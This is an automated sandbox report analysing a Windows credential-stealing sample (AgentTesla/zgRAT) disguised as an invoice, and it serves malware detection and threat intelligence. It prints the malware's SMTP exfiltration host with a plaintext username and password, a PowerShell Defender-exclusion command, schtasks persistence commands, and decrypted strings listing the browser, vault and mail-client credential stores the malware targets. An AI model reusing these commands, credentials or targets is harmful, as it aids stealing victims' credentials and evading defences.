Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICE_NO._29998172.exe

Overview

General Information

Sample Name:INVOICE_NO._29998172.exe
Analysis ID:876157
MD5:024997939b7ce9b28382176c0a70cec8
SHA1:48ef66cbadfff627b81794aaab7db1a6413cb43b
SHA256:13e98dcbf169f54503a15d9415b086222ae48f2e872c69c9417e56d29f610b85
Tags:exe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • INVOICE_NO._29998172.exe (PID: 6856 cmdline: C:\Users\user\Desktop\INVOICE_NO._29998172.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
    • powershell.exe (PID: 6944 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 7076 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INVOICE_NO._29998172.exe (PID: 6032 cmdline: C:\Users\user\Desktop\INVOICE_NO._29998172.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
  • txQleCu.exe (PID: 6012 cmdline: C:\Users\user\AppData\Roaming\txQleCu.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
    • schtasks.exe (PID: 6372 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • txQleCu.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\txQleCu.exe MD5: 024997939B7CE9B28382176C0A70CEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.gimpex-imerys.com", "Username": "qclab@gimpex-imerys.com", "Password": "h45ZVRb6(IMF"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.txQleCu.exe.4561c18.7.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
            • 0x17d0a:$pattern: 06 1E 58 07 8E 69 FE 17
            • 0x26a72:$a2: _CorExeMain
            • 0x228de:$a3: mscorlib
            • 0x23cce:$a4: .cctor
            • 0x22639:$a6: <Module>
            5.2.txQleCu.exe.4561c18.7.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              12.2.txQleCu.exe.400000.0.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
              • 0x19b0a:$pattern: 06 1E 58 07 8E 69 FE 17
              • 0x246de:$a3: mscorlib
              • 0x24439:$a6: <Module>
              5.2.txQleCu.exe.4561c18.7.raw.unpackMSIL_SUSP_OBFUSC_XorStringsNetDetects XorStringsNET string encryption, and other obfuscators derived from itdr4k0nia
              • 0x19b0a:$pattern: 06 1E 58 07 8E 69 FE 17
              • 0x28872:$a2: _CorExeMain
              • 0x246de:$a3: mscorlib
              • 0x25ace:$a4: .cctor
              • 0x24439:$a6: <Module>
              5.2.txQleCu.exe.4561c18.7.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                Click to see the 18 entries

                Sigma Signatures

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\INVOICE_NO._29998172.exe, ParentImage: C:\Users\user\Desktop\INVOICE_NO._29998172.exe, ParentProcessId: 6856, ParentProcessName: INVOICE_NO._29998172.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp, ProcessId: 7076, ProcessName: schtasks.exe

                Snort Signatures

                Timestamp:192.168.2.35.100.152.24496975872839723 05/26/23-11:30:19.875830
                SID:2839723
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872839723 05/26/23-11:30:38.087396
                SID:2839723
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872030171 05/26/23-11:30:19.875830
                SID:2030171
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872851779 05/26/23-11:30:38.087497
                SID:2851779
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872840032 05/26/23-11:30:19.875984
                SID:2840032
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872840032 05/26/23-11:30:38.087497
                SID:2840032
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496975872851779 05/26/23-11:30:19.875984
                SID:2851779
                Source Port:49697
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.35.100.152.24496985872030171 05/26/23-11:30:38.087396
                SID:2030171
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 5.2.txQleCu.exe.4561c18.7.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.gimpex-imerys.com", "Username": "qclab@gimpex-imerys.com", "Password": "h45ZVRb6(IMF"}
                Multi AV Scanner detection for submitted file
                Source: INVOICE_NO._29998172.exeReversingLabs: Detection: 25%
                Source: INVOICE_NO._29998172.exeVirustotal: Detection: 34%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeReversingLabs: Detection: 25%
                Machine Learning detection for sample
                Source: INVOICE_NO._29998172.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /log.tmp
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: KL
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: KL
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>[
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]<br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PW
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Time:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>User Name:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>Computer Name:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>OSFullName:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>CPU:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>RAM:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP Address:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: New
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IP Address:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: _
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: /
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 20
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 20
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 1
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 587
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: mail.gimpex-imerys.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: qclab@gimpex-imerys.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: h45ZVRb6(IMF
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: obtxxxtf@gmail.com
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: false
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: appdata
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU.exe
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: hOTAU
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Type
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: :
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <b>[
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]</b> (
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: )<br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {BACK}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ALT+TAB}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ALT+F4}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {TAB}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ESC}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {Win}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {CAPSLOCK}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYUP}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYDOWN}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYLEFT}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {KEYRIGHT}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {DEL}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {END}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {HOME}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {Insert}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {NumLock}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {PageDown}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {PageUp}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {ENTER}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F1}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F2}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F3}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F4}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F5}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F6}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F7}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F8}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F9}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F10}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F11}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {F12}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: control
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {CTRL}
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &amp;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &lt;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: >
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &gt;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: &quot;
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <br><hr>Copied Text: <br>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <hr>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: logins
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IE/Edge
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Secure Note
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Web Password Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Credential Picker Protector
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Web Credentials
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Credentials
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Domain Certificate Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Domain Password Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Windows Extended Credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SchemaId
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pResourceElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pIdentityElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pPackageSid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: pAuthenticatorElement
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IE/Edge
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UC Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: UCBrowser\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: *
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Login Data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: journal
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: wow_logins
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Safari for Windows
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <array>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <dict>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </string>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: <data>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: </data>
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -convert xml1 -s -o "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \fixed_keychain.xml"
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: "
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Credentials\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Microsoft\Protect\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: credential
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: QQ Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Tencent\QQBrowser\User Data
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Default\EncryptedStorage
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Profile
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \EncryptedStorage
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: entries
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: category
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: str3
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: str2
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: blob0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password_value
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: IncrediMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PopPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\IncrediMail\Identities\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Accounts_New
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: PopPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpPassword
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SmtpServer
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: EmailAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Eudora
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: current
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: SavePasswordText
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Settings
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ReturnAddress
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: -
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Falkon Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \falkon\profiles\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: profiles.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: profiles.ini
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \browsedata.db
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: autofill
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ClawsMail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Claws-mail
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \clawsrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \clawsrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: passkey0
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: master_passphrase_salt=(.+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \accountrc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: smtp_server
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: address
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: [
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor:
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ]
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \passwordstorerc
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: {(.*),(.*)}(.*)
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Flock Browser
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: APPDATA
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: \Flock\Browser\
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: signons3.txt
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ---
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: .
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ---
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: DynDns
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ALLUSERSPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Dyn\Updater\config.dyndns
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password=
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: https://account.dyn.com/
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: t6KzXhCh
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: ALLUSERSPROFILE
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Dyn\Updater\daemon.cfg
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: global
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: accounts
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account.
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: username
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: account.
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Psi/Psi+
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: name
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: jid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: password
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: jid
                Source: 5.2.txQleCu.exe.4561c18.7.unpackString decryptor: Psi/Psi+
